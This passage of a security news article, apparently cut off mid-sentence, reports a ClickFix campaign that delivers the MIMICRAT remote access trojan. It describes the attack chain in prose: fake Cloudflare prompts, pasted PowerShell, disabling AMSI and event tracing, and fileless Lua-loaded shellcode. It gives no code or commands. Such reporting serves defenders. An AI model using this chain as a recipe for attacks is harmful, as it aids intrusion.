A sophisticated cyber-espionage campaign leveraging a novel “ClickFix” technique to deliver a custom remote access trojan (RAT) named MIMICRAT has been identified by security researchers. This sophisticated multi-stage operation deceives users into executing malicious code by compromising legitimate websites, bypassing traditional security measures through social engineering rather than exploiting software vulnerabilities. The primary keyword for this article is “MIMICRAT.”
The operation, uncovered in early February 2024 by Elastic’s threat intelligence team, targets a wide range of industries globally. It employs a complex, multi-stage infection process designed for stealth and persistence, posing a significant risk to enterprises worldwide. The campaign’s broad reach is facilitated by dynamically localizing its deceptive lures into 17 different languages, ensuring effectiveness across diverse geographical locations and user bases.
The attack chain begins when a victim visits a seemingly trustworthy website, such as a website offering financial tools. This legitimate site has been injected with malicious JavaScript, which in turn presents a deceptive Cloudflare verification pop-up. This pop-up prompts the user to copy and execute a specific PowerShell command, purportedly to resolve a browser error. This “ClickFix” tactic, by exploiting user trust and the perceived legitimacy of the website, effectively circumvents common browser download protections.
Stealthy Infection and Execution of MIMICRAT
The infection sequence is meticulously engineered to evade detection by modern security solutions. Following the initial PowerShell execution, a highly obfuscated second script is downloaded. This script’s primary function is to disable critical security monitoring mechanisms, specifically Windows Event Tracing and the Antimalware Scan Interface (AMSI). By blinding these tools, the subsequent stages of the attack can proceed on the victim’s machine with significantly reduced risk of triggering alerts.
After disabling these security layers, a Lua-based loader is deployed. This loader is responsible for decrypting and executing the final MIMICRAT shellcode entirely in system memory. This fileless execution strategy means the malware, MIMICRAT, resides only in RAM, dramatically decreasing its observable footprint on the infected system and complicating forensic investigations for security teams. The use of a custom Lua loader further obscures the attack